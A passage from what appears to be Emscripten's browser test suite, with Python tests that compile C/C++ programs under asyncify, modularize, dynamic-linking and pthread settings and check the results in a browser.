print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2', '-s', 'ASYNCIFY'])
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=['-s', 'ASYNCIFY', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-g'])
def test_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
create_test_file('pre.js', 'Error.stackTraceLimit = 80;\n')
self.btest('browser/async_2.cpp', '40', args=['-O3', '--pre-js', 'pre.js', '-s', 'ASYNCIFY'])
def test_async_virtual(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual.cpp', '5', args=['-O' + str(opts), '-profiling', '-s', 'ASYNCIFY'])
def test_async_virtual_2(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_virtual_2.cpp', '1', args=['-O' + str(opts), '-s', 'ASSERTIONS', '-s', 'SAFE_HEAP', '-profiling', '-s', 'ASYNCIFY'])
# Test async sleeps in the presence of invoke_* calls, which can happen with
# longjmp or exceptions.
@parameterized({
'O0': ([],), # noqa
'O3': (['-O3'],), # noqa
})
def test_async_longjmp(self, args):
self.btest('browser/async_longjmp.cpp', '2', args=args + ['-s', 'ASYNCIFY'])
def test_async_mainloop(self):
for opts in [0, 3]:
print(opts)
self.btest('browser/async_mainloop.cpp', '121', args=['-O' + str(opts), '-s', 'ASYNCIFY'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-s', 'ASSERTIONS', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP', '-lSDL', '-s', 'ASYNCIFY'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-s', 'ASYNCIFY'])
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'ASYNCIFY'])
def test_async_iostream(self):
self.btest('browser/async_iostream.cpp', '1', args=['-s', 'ASYNCIFY'])
# Test an async return value. The value goes through a custom JS library
# method that uses asyncify, and therefore it needs to be declared in
# ASYNCIFY_IMPORTS.
# To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here.
@parameterized({
'normal': (['-s', 'ASYNCIFY_IMPORTS=["sync_tunnel"]'],), # noqa
'response': (['-s', 'ASYNCIFY_IMPORTS=@filey.txt'],), # noqa
'nothing': (['-DBAD'],), # noqa
'empty_list': (['-DBAD', '-s', 'ASYNCIFY_IMPORTS=[]'],), # noqa
'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa
})
def test_async_returnvalue(self, args):
if '@' in str(args):
create_test_file('filey.txt', '["sync_tunnel"]')
self.btest('browser/async_returnvalue.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_IGNORE_INDIRECT', '--js-library', path_from_root('tests', 'browser', 'async_returnvalue.js')] + args + ['-s', 'ASSERTIONS'])
def test_async_stack_overflow(self):
self.btest('browser/async_stack_overflow.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_STACK_SIZE=4'])
def test_async_bad_list(self):
self.btest('browser/async_bad_list.cpp', '0', args=['-s', 'ASYNCIFY', '-s', 'ASYNCIFY_ONLY=["waka"]', '--profiling'])
# Tests that when building with -s MINIMAL_RUNTIME=1, the build can use -s MODULARIZE=1 as well.
def test_minimal_runtime_modularize(self):
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.html', '-s', 'MODULARIZE', '-s', 'MINIMAL_RUNTIME'])
self.run_browser('test.html', None, '/report_result?0')
@requires_sync_compilation
def test_modularize(self):
for opts in [
[],
['-O1'],
['-O2', '-profiling'],
['-O2'],
['-O2', '--closure', '1']
]:
for args, code in [
# defaults
([], '''
let promise = Module();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
def test_modularize_network_error(self):
test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err.message.slice(0, 54));
});
</script>
''')
print('Deleting a.out.wasm to cause a download error')
os.remove('a.out.wasm')
self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
def test_modularize_init_error(self):
test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
if (typeof window === 'object') {
window.addEventListener('unhandledrejection', function(event) {
reportResultToServer("Unhandled promise rejection: " + event.reason.message);
});
}
createModule()
.then(() => {
reportResultToServer("Module creation succeeded when it should have failed");
})
.catch(err => {
reportResultToServer(err);
});
</script>
''')
self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
create_test_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['INITIAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory)
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom INITIAL_MEMORY value
var foo = Foo({ INITIAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
@parameterized({
'': ([0],),
'inworker': ([1],),
})
def test_dylink_dso_needed(self, inworker):
self.emcc_args += ['-O2']
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
create_test_file('test_dylink_dso_needed.c', src + r'''
#include <emscripten/em_asm.h>
int main() {
int rtn = test_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
return rtn;
}
''' % expected_output)
self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])
self._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
def test_dynamic_link_pthread_many(self):
# Test asynchronously loading two side modules during startup
# They should always load in the same order
# Verify that function pointers in the browser's main thread
# reffer to the same function as in a pthread worker.
# The main thread function table is populated asynchronously
# in the browser's main thread. However, it should still be
# populated in the same order as in a pthread worker to
# guarantee function pointer interop.
create_test_file('main.cpp', r'''
#include <thread>
int side1();
int side2();
int main() {
auto side1_ptr = &side1;
auto side2_ptr = &side2;
// Don't join the thread since this is running in the
// browser's main thread.
std::thread([=]{
REPORT_RESULT(int(
side1_ptr == &side1 &&
side2_ptr == &side2
));
}).detach();
return 0;
}
''')
# The browser will try to load side1 first.
# Use a big payload in side1 so that it takes longer to load than side2
create_test_file('side1.cpp', r'''
char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
int side1() { return 1; }
''')
create_test_file('side2.cpp', r'''
char const * payload2 = "0";
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest(self.in_dir('main.cpp'), '1',
args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
'-s', 'RUNTIME_LINKED_LIBS=["side1.wasm","side2.wasm"]'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
@requires_threads
def test_pthread_c11_threads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
expected='0',
args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
# Test that the emscripten_ atomics api functions work.
@parameterized({
'normal': ([],),
'closure': (['--closure', '1'],),
})
@requires_threads
def test_pthread_atomics(self, args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
# Test c++ std::thread::hardware_concurrency()
@requires_threads
def test_pthread_hardware_concurrency(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
@parameterized({
'join': ('join',),
'wait': ('wait',),
})
@requires_threads
def test_pthread_main_thread_blocking(self, name):
print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
if name == 'join':
print('Test that by default we just warn about blocking on the main thread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
print('Test that everything works ok when we are on a pthread.')
self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
for debug in [[], ['-g']]:
args = opt + debug
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
expected='0',
args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
extra_tries=0) # this should be 100% deterministic
print() # new line
test([])
test(['-O3'])
# TODO: re-enable minimal runtime once the flakiness is figure out,
# https://github.com/emscripten-core/emscripten/issues/12368
# test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
